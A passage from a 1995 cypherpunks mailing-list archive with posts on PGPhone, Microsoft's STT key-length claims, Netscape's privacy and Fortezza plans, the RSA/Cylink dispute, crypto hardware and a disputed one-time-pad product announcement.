discussions focus on systems in which there is a definition, and typically a well-behaved mathematical model, for all of the significant states. Some instructors believe this will assist students in appreciating the concepts of statistical mechanics and quantum thermodynamics. To build a working apparatus (or software systems, as we are discussing here), the designer is typically faced with the breakdown of well-behaved mathematical models. Everything from degenerate states to the "baked in" uncertainty of certain states tends to undermine the mathematical foundations of a theorist's constructions. Of course the theoretical models are absolutely critical, but the designer must always caution themselves against drawing inferences without measurements and clearly stated rationales that speak to these physical realities that lead to mathematical weaknesses. Ultimately, the probabilistic nature of such systems may be "moved around," but not removed from the model! Since the real world of actual measurements interferes with essentially everything we claim to "know" about quantities such as entropy, the real danger is assigning an independent "meaning" to these constructs. Why? Because these quantities do not exist independently, they only exist with respect to our predictive models of a system's behavior. So these models do not really "enumerate" anything about states, but rather restate the probability assumptions of the model in the form of a "working equation." In addition, drawing inferences as to the behavior of systems based on common mathematical form is simply inviting trouble, even at the theoretical level. Mathematical models are not the real world, and the superficial mathematical consistency between say, the functional form of a resonance in a quantum well and a marble in a bowl, does not mean that the marble gives any special insight into the nature of the quantum well. In fact, beyond the curiosity of similar equations, the most important information is in the distinctions and clarifications (emanating from theory) between the systems from a practical, apparatus building, real world perspective (as contrasted with the "everything is just a special case of X" perspective). This danger is also present in designs for sources of entropy to seed RNGs for random data or to create uniformly distributed keys. Well designed models will avoid rephrasing assumptions as conclusions, and will explicitly address the mathematical weaknesses upon which the theoretical arguments in support of the model are ultimately based. dvw From lethin at ai.mit.edu Thu Sep 28 14:57:39 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Thu, 28 Sep 95 14:57:39 PDT Subject: NPR reports on Digital Express Secure Telephone Message-ID: <199509282157.RAA23858@grape-nuts.ai.mit.edu> Digital Express coverage on NPR. Seastrom and Shiller(sp?) talking over a powerbook using PGPPhone. Demonstrating secure telephones! Edward Appel, director of counterintelligence FBI representative on National Security Council is quoted. "It's very easy for a criminal or a terrorist of a spy to use this for their advantage." Reporter "You can connect to an MIT computer and get pgp-phone, you have MIT Press 900 page book from PGP! "You can carry that book with you, anywhere you want in the world... Export control laws don't cover books..." Hal Abelson, MIT advisor to MIT press, etc, etc, ... Appel "It's clearly not some weird form of poetry. It is source code, it is a program, ... if you can use it to tell the computer what to do then it is part of the machine itself..." The authors of PGP say "The real threat is that this technology is not distributed widely enough..." From mattt at microsoft.com Thu Sep 28 15:03:52 1995 From: mattt at microsoft.com (Matt Thomlinson) Date: Thu, 28 Sep 95 15:03:52 PDT Subject: 2^25 Crays a Year to Break STT Message-ID: <9509282305.AA09854@netmail2.microsoft.com> don't you love how the media gets the story straight? ---------- From: Bill Stewart To: Subject: Re: 25 Crays a Year to Break STT Date: Thursday, September 28, 1995 10:33AM > Microsoft said its Secure Transaction Technology (STT), was > designed to provide a much higher level of security for > credit card transactions on the Internet. Netscape's > general purpose encryption system uses a 40 or 128-bit > electronic "key", while STT will use 2,000-bit keys. Sigh. Apples and oranges, and they know it. ..... > Although no encryption system was totally secure, Mr Dent > estimated it would take "25 Cray supercomputers a year" to > break the STT codes. So how much work can 25 Crays do in a year? Crack single-DES? Maybe RC4/64? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From andrew_loewenstern at il.us.swissbank.com Thu Sep 28 15:26:57 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Thu, 28 Sep 95 15:26:57 PDT Subject: awards for hacking microsoft Message-ID: <9509282225.AA04018@ch1d157nwk> > What else, Chaum's Digicash. If you are unwilling to part with > any of your own, perhaps you can collect contributions, or maybe > the Digicash people will pony-up some extra cyberbucks for a good > cause. After all, they are worth the paper they're printed on. > :-) Don't tell that to the people on the ECM mailing list! People there have been trading cyberbucks for RealMoney. The last successful trade I saw was 100 cyberbucks for 4 UK pounds... andrew From frederic at none.net Thu Sep 28 15:41:47 1995 From: frederic at none.net (Frederic Miserey) Date: Thu, 28 Sep 95 15:41:47 PDT Subject: 25 Crays a Year to Break STT Message-ID: <9509282340.AA44771@margote.none.net> > to encourage widespread adoption of STT, Microsoft and Visa are making > its technical specifications available at no charge to third parties > to allow them to develop software. > I can't find any infos on www.microsoft.com. Any hint on how to get these specs ? Frederic --------------------------------------------------------------------------- Frederic Miserey mailto:frederic at none.com none programs finger me for PGP key 42 3A 75 40 71 E6 DC 3B 50 90 F9 6B 26 28 60 91 "The last bug isn't fixed until the last user is dead" - Sidney Markowitz From jsw at neon.netscape.com Thu Sep 28 15:58:07 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Thu, 28 Sep 95 15:58:07 PDT Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?) In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu> Message-ID: <44f98a$mu5@tera.mcom.com> In article <199509281309.JAA12017 at bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) writes: > This came across the SSL mailing list. Anyone know Taher's position > on key-escrow? Just because we may do fortezza support for customers who want it does not mean that we will force key escrow on the rest of the world. I for one am against any kind of GAK on moral grounds. I also think that trying to implement mandatory GAK in a software only system would be a nightmare. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From hallam at w3.org Thu Sep 28 16:26:20 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 28 Sep 95 16:26:20 PDT Subject: VISA and Microsoft STT Specs available Message-ID: <9509282326.AA25864@zorch.w3.org> Hi, The specs for STT are now available. Due to various circumstances too complex to explain these are currently being served via the W3C web server at :- http://www.w3.org/hypertext/WWW/Payments/STT.html This does not constitute an endorsement of these specifications by W3C nor any representation of the fitness thereof. Note that these documents may well move in the future. For more payments related info see:- http://www.w3.org/hypertext/WWW/Payments/ The roadmap has been updated appropriately. Phill Hallam-Baker From anonymous at robo.remailer Thu Sep 28 17:09:31 1995 From: anonymous at robo.remailer (anonymous at robo.remailer) Date: Thu, 28 Sep 95 17:09:31 PDT Subject: "Notes" to be Eclipsed by "Netscape" In-Reply-To: Message-ID: <199509290004.RAA28740@infinity.c2.org> > > In an interview today in a Stockholm paper with a technical spokes- > person for Hewlett-Packard (about the HP internal net with 19 > worldwide connections to the Internet - by the way, allegedly > no one has ever succeeded in breaking their firewalls) it was "allegedly". Well I suppose you don't need to break the HP firewall to get past it, so I guess that could be an appropriate statement. (I adminned a few of their firewalls for a short time on contract while the person who was normally in charge of them was away. Calling it a firewall is a stretch of the word-- They allow telnets from sites at berkeley.edu and stanford.edu with reusable passwords, for one example.) From gnu at toad.com Thu Sep 28 17:19:04 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 28 Sep 95 17:19:04 PDT Subject: SAIC bought InterNic, but who is SAIC? A spook contractor! Message-ID: <9509290018.AA08111@toad.com> Forwarded-by: gordoni at base.com (Gordon Irlam) Thought you might find this interesting. I don't know if you have thought about it or not, but control over the root name service plus some funky software is all that it takes to be able to selectively snoop on all the packets addressed to any host on the net. DNS is currently the achilles heel of a secure internet... gordoni From: Wes Thomas The press recently reported that the National Science Foundation has turned over Internet Domain Name registration to Network Solutions, Inc. (NSI) of Herndon, VA. The press failed to note some interesting connections. Tomorrow morning (Sept. 26), Web Review, a biweekly online magazine (see Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in May by Scientific Applications International Corporation (SAIC) of San Diego. SAIC is a $2 billion company indicted by the Justice Department on ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC pleaded guilty) and sued by the Justice Department for civil fraud on an F-15 fighter contract. SAIC's board members include Admiral Bobby Inman, former NSA head and deputy director of the CIA; Melvin Laird, Nixon's defense secretary; and retired General Max Thurman, commander of the Panama Invasion. Recently departed board members include Robert Gates, former CIA director; William Perry, current Secretary of Defense; and John Deutch, the current CIA director. Current SAIC government contracts include re-engineering information systems at the Pentagon, automation of the FBI's computerized fingerprint identification system, and building a national criminal history information system. "At the very time the Internet community is struggling with the issues of encryption and privacy, I'm more than a little uneasy to find this bunch of ex-spooks sitting at the very entry point of the Net," says Jim Warren (a leading activist in making government records accessible) in the article, which was written by investigative journalist Stephen Pizzo, Web Review Senior Editor and co-author of the book Inside Job, an expose on the savings & loan looting. Web Review is produced by Songline Studios, an affiliate of O'Reilly & Associates. From csmyth at blaze.cs.jhu.edu Thu Sep 28 17:27:07 1995 From: csmyth at blaze.cs.jhu.edu (Chris Smyth) Date: Thu, 28 Sep 95 17:27:07 PDT Subject: Netscape and privacy Message-ID: <9509290026.AA08282@toad.com> The Communications Week issue of September 25 1995 contains an interesting interview with Netscape Chairman Jim Clark in which he outlines the future that he envisions for his company. The interview also contains a passage discussing the Netscape browser software that I find somewhat disturbing. Many cypherpunk list members are concerned with the general issue of electronic privacy and with the programming of WWW browsers, so I think this post is relevant to the list. Clark's apparent attitude toward privacy makes me uneasy. Begin excerpt Comm Week: How do you track usage? Clark: We have worked out schemes to tell us when you use our program and for how long you use it. That capability is easy to add. We can tell each and every time you turn it on and we can tell whether you have paid for it or not. We were getting 10 million hits a day at our Web site. It has doubled since our IPO. End excerpt I personally oppose the collection of this type of behavioral tracking information without my explicit consent, and I would reconsider using software which implements the type of tracking Clark mentions above. Note, Clark's reply is ambiguous because it does not indicate if the `schemes' have been implemented or deployed at this time. Some list member associated with Netscape may wish to clarify Clark's comments. It is true that a user automatically contacts the Netscape Web cite when starting the browser if he or she has not reset the default home page. I reset my home page long ago, but I do not know if the Netscape site is still contacted anyway. Nor do I know if Netscape is contacted when I quit the browser, or if elapsed usage time is tracked. The future Clark posits for his corporation depends on people adopting Netscape software for a wide variety of tasks. He wants the browser to evolve toward being a general multimedia web browser, mail handler, newsreader, and collaboration tool. Such a tool would handle large amounts of private and/or proprietary information and the creator of such a tool must be extremely sensitive to privacy concerns in my opinion. Collecting and relaying information about usage is potentially a significant violation of the privacy users will expect. Certainly, it is tempting to gather information for marketing purposes and other reasons. For example, some browser company unconcerned about privacy might program its browser to regularly transmit information about bookmarks and histories to a database site for analysis and data-mining. But ignoring privacy concerns risks invoking the fervent ill-will of many users. Perhaps I am over-reacting to Clark's comments. Even if I am over-reacting, Netscape should consider developing a statement of its privacy policy and making it available at its web site. It is not easy to craft clear, concise and general privacy guidelines. Below are two crudely crafted suggestions for properties that should be satisfied by a browser. 1) Information about browser usage will never be collected and/or transmitted surreptitiously to any other agent on the net. 2) Transfer of information should be done openly with the explicit initiation/agreement of the browser user. Note, currently the Netscape browser (and other browsers) apparently transmit identification information such as the browser type, version number, and machine name when making a connection. The browser user should probably be told about this information in my opinion. Chris Smyth csmyth at blaze.cs.jhu.edu From Doug.Hughes at Eng.Auburn.EDU Thu Sep 28 17:31:18 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 28 Sep 95 17:31:18 PDT Subject: worldwide announce: New OTP Mail/FTP apps Message-ID: <199509290031.TAA24720@lab21.eng.auburn.edu> A company in Israel named Elementrix has just announce at Interop an entirely new paradigm in secure transactions. They have a secure one time pad that allows people to exchange mail and ftp files back in forth in complete security without the worries of key management or storage or secure random number generation or synchronization. In the words of Winn Schwartau: "This really fucks with your brain" Both he and David Kahn have gotten information out of non-disclosure, as well as several other un-named experts in cryptography about the nature of this new development. They were astounded and have provided assurances as to its authenticity and ability to work as advertised. So far they have no released the complete protocol, but plan to do so as soon as the Patent issues pending in several countries have been resolved. The protocol will be completely published and subject to scrutiny by everybody. To me it looks like it would be trivial for them to integrate it into any and all kinds of browsers, clients and applications. Of course, I do not have a complete knowledge of the entire protocol, but the brief overview was simple enough to understand in concept. If it can work in FTP, it can surely work in telnet as well, it's just a different front end over a TCP/IP connection. I realize that there will be those out there on this list who will immediately dismiss this as a hoax, as would have I had I not seen it operate with my own eyes, and sat through the conference. It was a case of serendipity for me, showing up at the booth and getting an invite to the press conference on the one day I decided to attend Networld/Interop. It works something like this: (I may not have it completely right, but this is what I understood of the broken English of the man without the microphone) A third party generates random numbers, or one of the two communicating parties. The numbers do not have to be secret. There is also a published table of mappings.. Something like, a number, and an operation.. 1 -> add 23 2 -> add 21 3 -> add 40 4 -> add 57 90 -> sub 23 One initial connection is all that is needed to have a secure connection for the lifetime of the two communicating parties. This initial connection can be accomplished via any number of ways. It does involve an initial one time only shared secret. This is much different than the many shared secrets and key management issues of private and public key systems. For the initial connection you can stick the machines back to back if you are really worried about security. This initial transaction serves as a seed for subsequent transactions. All subsequent transactions depend on preceding transactions. A degree of randomness comes from the randomness of the messages. Each next word in the message is random. (the argument goes like this: If you already know what the next word in the message is, there is no point in sending the message in the first place, because you know what all the words in the message are.) This imparts some degree of randomness, as no two beings will have an entire conversation over their lives the same as their conversation with anybody else: similar arguments can be applied to file transfers. After the initial exchange every message sent subsequently gets randomized from the previous randomness of the messages plus something in the table. If somebody else makes an exact copy of your machine, and sends a message as you, then you can no longer send messages to the other party as you are out of sync, and an Intruder alert is flagged if you do try to send a message. Then you and the foreign party can resynchronize. This new state is the basis for new messages. Argument: "That's fine, but how to I communicate securely with someone over the Internet with email that I'm not able to setup a secure channel with." Apparently each distribution disk is encoded with a unique ID and some kind of unique (and as yet undisclosed table and algorithm). This table allows the two parties to somehow setup a secure session and send mail. This does not solve authentication problems. If somebody steals your disk and sends mail to someone, they can appear to be you (or anybody). However, the minute you try to send mail to that same person, there is state on the remote machine with the imposter that you do not possess that flags an intruder problem, and new negotiations can begin. However, snoopers of the original message will still be unable to decode the one time pad. Winn Schwartau and Dr. David Karn have both signed non-disclosure and both made announcements to the affect that it does work as advertised. Also, it is not strictly random numbers in the traditional sense. It relies on the fact that the message is composed of a random series of words to create the one time pad. However, the one time pad does not repeat itself due to the continuing diversity of subsequent messages. They have reviewed the math and the algorithms and stated that it's a completely new way to think about cryptography, and the math is valid. Usability: point and click.. Click on the little lock button and the message is encrypted on the fly. The mail browser decrypts the message on the fly. After it is decrypted it is stored on the hard drive in plain text. (As it would have to be, unless you encrypt it with some conventional secret-key algorithm like DES or IDEA). This is fine as they say you have to have some degree of physical security anyway, and this is only to protect you on the networks in between the two machines. I'm inclined to agree. Notes: It's fast!! I'm just telling you what I heard. I have no idea how or what is stored as state information if anything. (part of the currently undisclosed algorithm). I was very skeptical at first, but have affected cautious optimism at this point. (until it is published). I just have a couple things to add. If it's true and works as advertised, we're in for a real treat, and the NSA and FBI are going to be really upset. :) Those drug smugglers and kiddie porn pushers are going to be immune to network wire taps. Next step: illegal algorithms, illegal XOR. ;) From cman at communities.com Thu Sep 28 17:51:04 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 28 Sep 95 17:51:04 PDT Subject: Crypto hardware (was: Using sound cards to accelerate RSA?) Message-ID: [Tim May writes about why crypto h/w acceleration using DSPs, and DSPs in general, are likely doomed niche markets.] I pretty much agree with Tim, except it's important to realize that a for a _server_ that is doing a lot of RSA operations, the difference between a 3.2 second encryption and a 1.9 second encryption is significant. Peak transaction volume for any public key-based payment system is going to be a factor of how many RSA ops you can do per second. It seems clear though that what's desired for this scenario is good, dedicated hardware based on ASICs. I've been trying to buy a sample board from Uti-Maco in Belgium, which looks ideal for this sort of thing, but have finally given up in the face of communications problems, their fear of RSA Labs, new Belgian export controls they haven't tried to work with yet, and their belief that I need a US crypto import license, which I can't persuade anyone to admit _exists_. Anyhow, for personal use, the only dedicated hardware we're likely to see will not be focused on speed, but rather on security. Stuff like the various PCMCIA cards from Nat Semi and Telequip, the "decoder rings" and "decoder keychain do-dads" and so forth that have security and conveniece benefits. From cjs at netcom.com Thu Sep 28 17:57:57 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Thu, 28 Sep 95 17:57:57 PDT Subject: worldwide announce: New OTP Mail/FTP apps In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu> Message-ID: <199509282349.TAA00187@hoopsnake.cjs.net> > One initial connection is all that is needed to have a secure > connection for the lifetime of the two communicating parties. This > initial connection can be accomplished via any number of ways. It > does involve an initial one time only shared secret. This is much > different than the many shared secrets and key management issues of > private and public key systems. For the initial connection you can > stick the machines back to back if you are really worried about > security. This initial transaction serves as a seed for subsequent > transactions. All subsequent transactions depend on preceding > transactions. A degree of randomness comes from the randomness of > the messages. Each next word in the message is random. I'm a little new to this, but I thought the whole idea behind keys was not having to whisper "secrets" to someone on the other side of a crowded mall. Most people don't have the luxary of connecting their computers back to back with someone on the other side of the world just to ensure a secure communications path. Ther would have to be some mechnisms to ensure that secure delivery of your "secret", and that brings us back to key management, so the whole thing is rather self defeating. Christopher From anon-remailer at utopia.hacktic.nl Thu Sep 28 18:10:21 1995 From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request) Date: Thu, 28 Sep 95 18:10:21 PDT Subject: Q&A on the RSA/Cylink legal dispute In-Reply-To: <9508288123.AA812314973@snail.rsa.com> Message-ID: <199509290110.CAA23301@utopia.hacktic.nl> baldwin , Robert W. Baldwin wrote: >Q. Why can't RSA and Cylink simply settle their differences? > > A. That's a good question. The fact is that RSA recognizes this > litigation is not beneficial to anyone and has offered to settle the > dispute by granting Cylink a license to the MIT patent. Real Answer: Because they're all a bunch of crooks. PKP was formed for the purpose of monopolizing the market and screwing the customers. Unfortunately, RSA and Cylink were too busy trying to screw each other that they forgot what their real mission was. > Cylink has consistently overestimated the strength of its legal > position and has refused all reasonable offers. According to the settlement, RSA made only one offer, which Cylink refused. (Which was all that RSA was obligated to do.) > Cylink now finds itself in the unenviable position of trying > to sell its security products without RSA technology - which > is the de facto industry standard. No amount of "spin > doctoring" in press releases by Cylink changes that fact. Maybe not, but it looks like RSA has their own spin doctors working on it as well. From jonm at netscape.com Thu Sep 28 18:39:34 1995 From: jonm at netscape.com (Jon Mittelhauser) Date: Thu, 28 Sep 95 18:39:34 PDT Subject: Netscape and privacy In-Reply-To: <9509290026.AA08282@toad.com> Message-ID: <44fin4$rdq@tera.mcom.com> csmyth at blaze.cs.jhu.edu (Chris Smyth) wrote: >I personally oppose the collection of this type of behavioral tracking >information without my explicit consent, and I would reconsider using >software which implements the type of tracking Clark mentions above. Note, >Clark's reply is ambiguous because it does not indicate if the `schemes' >have been implemented or deployed at this time. Some list member associated >with Netscape may wish to clarify Clark's comments. > >It is true that a user automatically contacts the Netscape Web cite when >starting the browser if he or she has not reset the default home page. I >reset my home page long ago, but I do not know if the Netscape site is still >contacted anyway. Nor do I know if Netscape is contacted when I quit the >browser, or if elapsed usage time is tracked. The Navigator doesn't make any special connections nor perform any data collection on the client-side. In fact, most of the engineers here would quit long before we would provide information without consent. That was the reason for removing the mail address from the HTTP header years ago...it is very easy to track what the Navigator sends out by simply setting up a proxy/firewall... Netscape (the company) does attempt to track users through their contacts with our homepage...Needless to say, this is a common practice. We track hits, IP addresses, and attempt to use cookies to determine unique users...We sell advertising based on estimates of hits/etc...if you never hit our site, you are never counted... even if you do hit our site, no information (other than IP address) is ever known... -Jon From jim at acm.org Thu Sep 28 18:43:51 1995 From: jim at acm.org (Jim Gillogly) Date: Thu, 28 Sep 95 18:43:51 PDT Subject: worldwide announce: New OTP Mail/FTP apps In-Reply-To: <199509290031.TAA24720@lab21.eng.auburn.edu> Message-ID: <199509290143.SAA19419@mycroft.rand.org> > Doug Hughes writes: > you are really worried about security. This initial transaction serves > as a seed for subsequent transactions. All subsequent transactions > depend on preceding transactions. A degree of randomness comes from the > randomness of the messages. Each next word in the message is random. > After the initial exchange every message sent subsequently gets randomized > from the previous randomness of the messages plus something in the table. OK, you expected this, but here goes anyway. This isn't a one time pad because the "randomness" isn't really random -- it depends on a bunch of plaintext. Technically from your description this looks like a plaintext autokey system. A true OTP requires honest to goodness physically random key material for the pad. It may be quite strong, but it just doesn't fit the definition. Sigh. People keep throwing OTP around because it's the only known perfect system -- until we get quantum crypto, I suppose -- but few companies actually want to go to the trouble to implement the real thing. And with good reason -- it's a nuisance to do secure exchanges on the keying material. Jim Gillogly Sterday, 8 Winterfilth S.R. 1995, 01:41 From tcmay at got.net Thu Sep 28 19:33:21 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 28 Sep 95 19:33:21 PDT Subject: Crypto hardware (was: Using sound cards to accelerate RSA?) Message-ID: At 1:49 AM 9/29/95, Douglas Barnes wrote: >[Tim May writes about why crypto h/w acceleration using DSPs, >and DSPs in general, are likely doomed niche markets.] > >I pretty much agree with Tim, except it's important to realize >that a for a _server_ that is doing a lot of RSA operations, the >difference between a 3.2 second encryption and a 1.9 second >encryption is significant. Peak transaction volume for any >public key-based payment system is going to be a factor of how many >RSA ops you can do per second. I don't disagree with Doug about this. But I don't think there are many "server" systems running a lot of RSA at this point...for most of us, the amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of the total computons consumed running screen savers. I'm just not convinced I'll soon invest in a company offering RSA acceleration. (I recall seeing articles about specialized modular exponentiation hardware in 1988, and Cylink was offering several such chips. I've yet to see any commercial boards, for reasonable prices. And I'm willing to be that no more than 3 members of our list would buy such a board, even if the hooks were in place to let PGP, RSAREF, etc. use it. Just a hunch.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From samman-ben at CS.YALE.EDU Thu Sep 28 19:40:22 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Thu, 28 Sep 95 19:40:22 PDT Subject: GSSAPI compliant Apps Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I'm interested in writing a GSSAPI compliant app, but I have been so far unsucessful in finding an example of GSSAPI compliant code to use as a baseline. Does anyone have any pointers? Thanks Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMGtcgL5ALmeTVXAJAQElIQL+JzyPIvta+NRiU6id45o557kvaxGvti4A cREqsyn1oJPXS44GW9/RzdzJMjN7ofnMKqNt/TbKGgMni+XYCc/OAxLauDoKl8vm 4v/tTtfgVWGoS1jEB03SAB7Z2U49HxWv =35YV -----END PGP SIGNATURE----- From jsw at neon.netscape.com Thu Sep 28 19:55:06 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Thu, 28 Sep 95 19:55:06 PDT Subject: Netscape and privacy In-Reply-To: <9509290026.AA08282@toad.com> Message-ID: <44fn4k$s4t@tera.mcom.com> In article <9509290026.AA08282 at toad.com>, csmyth at blaze.cs.jhu.edu (Chris Smyth) writes: > It is true that a user automatically contacts the Netscape Web cite when > starting the browser if he or she has not reset the default home page. I > reset my home page long ago, but I do not know if the Netscape site is still > contacted anyway. Nor do I know if Netscape is contacted when I quit the > browser, or if elapsed usage time is tracked. We are counting unique installations of netscape. We have no way of mapping that information to a user name. We don't save any information about you when you contact our web site. The Navigator doesn't make connections to our site behind your back. > The future Clark posits for his corporation depends on people adopting > Netscape software for a wide variety of tasks. He wants the browser to > evolve toward being a general multimedia web browser, mail handler, > newsreader, and collaboration tool. Such a tool would handle large amounts > of private and/or proprietary information and the creator of such a tool > must be extremely sensitive to privacy concerns in my opinion. Collecting > and relaying information about usage is potentially a significant violation > of the privacy users will expect. We are very sensitive to privacy concerns. A bunch of folks now working here revolted against an effort to track keystrokes and mouse clicks in Mosaic while they were at NCSA. One of those folks was marca himself. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From warlord at MIT.EDU Thu Sep 28 20:06:05 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 28 Sep 95 20:06:05 PDT Subject: GSSAPI compliant Apps In-Reply-To: Message-ID: <199509290305.XAA25007@toxicwaste.media.mit.edu> Grab the Kerberos V distribution from MIT; it has a GSSAPI implementation and a sample client/server that use it. I believe you can find it on: ftp://athena-dist.mit.edu/pub/ATHENA/kerberos -derek > I'm interested in writing a GSSAPI compliant app, but I have been so far > unsucessful in finding an example of GSSAPI compliant code to use as a > baseline. > > Does anyone have any pointers? From perry at piermont.com Thu Sep 28 20:54:50 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 28 Sep 95 20:54:50 PDT Subject: Crypto hardware (was: Using sound cards to accelerate RSA?) In-Reply-To: Message-ID: <199509290354.XAA21646@frankenstein.piermont.com> Timothy C. May writes: > At 1:49 AM 9/29/95, Douglas Barnes wrote: > >[Tim May writes about why crypto h/w acceleration using DSPs, > >and DSPs in general, are likely doomed niche markets.] > > > >I pretty much agree with Tim, except it's important to realize > >that a for a _server_ that is doing a lot of RSA operations, the > >difference between a 3.2 second encryption and a 1.9 second > >encryption is significant. > > I don't disagree with Doug about this. But I don't think there are many > "server" systems running a lot of RSA at this point. [...] > for most of us, the > amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of > the total computons consumed running screen savers. And if problems like this don't get solved, how do you expect digital online banking to be done? Psychic quantum transfers between the machines? What do you think a bank in the future is, if not a server that has to do lots and lots of RSA or D-H or what have you? Sorry for being nasty, Tim. Its just that some of us live in the real world, have real clients, and actually worry about this as a problem. This *is* a legitimate problem. Consider what the load on a web site using D-H key exchange for every connection gets like when you have millions of people hitting it every day. > (I recall seeing articles about specialized modular exponentiation hardware > in 1988, and Cylink was offering several such chips. I've yet to see any > commercial boards, for reasonable prices. And I'm willing to be that no > more than 3 members of our list would buy such a board, even if the hooks > were in place to let PGP, RSAREF, etc. use it. Just a hunch.) You obviously haven't heard of Fortezza cards. Yup, they are key escrowed -- but they do in fact do public key operations on board. There are a lot of them floating around. The reason the market for this is weird is the same reason Sun took the DES chips off its motherboards years ago -- you can't conduct modern business with the fucked up export regime we are dealing with. .pm From abc at gateway.com Thu Sep 28 20:58:54 1995 From: abc at gateway.com (Alan B. Clegg) Date: Thu, 28 Sep 95 20:58:54 PDT Subject: awards for hacking microsoft In-Reply-To: <9509282225.AA04018@ch1d157nwk> Message-ID: On Thu, 28 Sep 1995, Andrew Loewenstern wrote: > > What else, Chaum's Digicash. If you are unwilling to part with > > any of your own, perhaps you can collect contributions, or maybe > > the Digicash people will pony-up some extra cyberbucks for a good > > cause. After all, they are worth the paper they're printed on. > > :-) > > Don't tell that to the people on the ECM mailing list! People there have > been trading cyberbucks for RealMoney. The last successful trade I saw was > 100 cyberbucks for 4 UK pounds... And to add to the exchange, I'm offering a US$50 [real] discount for any client of Gateway Communications that deposits $5 [cyber] via my web page. The reduction hurts me very little, and the exchange of cyberbucks is fun. Isn't that why we do this stuff anyway? -abc It's time to stand and cry | Alan B Clegg That Freedom will not live | President Beyond our willingness to die | Gateway Communications -Lester Bork | http://www.gateway.com From nobody at REPLAY.COM Thu Sep 28 21:39:53 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 28 Sep 95 21:39:53 PDT Subject: No Subject Message-ID: <199509290439.FAA26254@utopia.hacktic.nl> Subject: Re: 25 Crays a Year to Break STT > Although no encryption system was totally secure, Mr Dent > estimated it would take "25 Cray supercomputers a year" to > break the STT codes. Is it just me, or does someone need to be humbled? STTbruter anyone? From carolann at censored.org Thu Sep 28 22:02:32 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Thu, 28 Sep 95 22:02:32 PDT Subject: 53 of the FAX No's. are GOOD! Message-ID: <199509290502.WAA29977@usr1.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- 53 of the Fax numbers were good. About 15 were no good, and the rest turned in no answers. I will update this URL tomorrow, when I can completely check the list; http://www.c2.org/~carolann/enda001.html is where the list is at on the WWW. Love Always, Carol Anne -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGt9S4rpjEWs1wBlAQE5iQP/e74RL+Rmui47LgWT9hk4LNlfISGkHYS2 fdVsut/mbLF/FrRIeETecaSJOOxOBXBr84OYzRLicka+Lm01ciW32pbXYvILftLS vNs7ppWoIs+C343cd3TOZx0p2Q8QuSZSUSGSYCEk1dwZTl/rd1iHTU3DW2ALZ66P xOTLPUV8p1Y= =dJpK -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From sameer at c2.org Thu Sep 28 23:04:10 1995 From: sameer at c2.org (sameer) Date: Thu, 28 Sep 95 23:04:10 PDT Subject: Ray Cromwell: Another Netscape Bug (and possible security (fwd) Message-ID: <199509290559.WAA24563@infinity.c2.org> Forwarded message: From mark at lochard.com.au Thu Sep 28 23:32:30 1995 From: mark at lochard.com.au (Mark) Date: Thu, 28 Sep 95 23:32:30 PDT Subject: "Notes" to be Eclipsed by "Netscape" In-Reply-To: Message-ID: <199509290423.AA52917@junkers.lochard.com.au> >person for Hewlett-Packard (about the HP internal net with 19 >worldwide connections to the Internet - by the way, allegedly >no one has ever succeeded in breaking their firewalls) I am unable to discuss the details of this (so dont ask), but HP's firewall was breached way back in the early 90's. The breach was not discovered, more upgraded over so I am unsure as to wether it is still open. Blanket statements such as company X or firewall Y not being breached are almost always false. One annecdote is a domain installed a firewall but didnt bother to examine their internal hosts security. This was a mistake because a number of hosts were *already* trojaned so an outsider could trigger the mechanisms to allow entry seamlessly through the firewall. This is a good arguement for keeping OS versions current. Have a nice day. Mark mark at lochard.com.au The above opinions are rumoured to be mine. From stewarts at ix.netcom.com Thu Sep 28 23:59:51 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 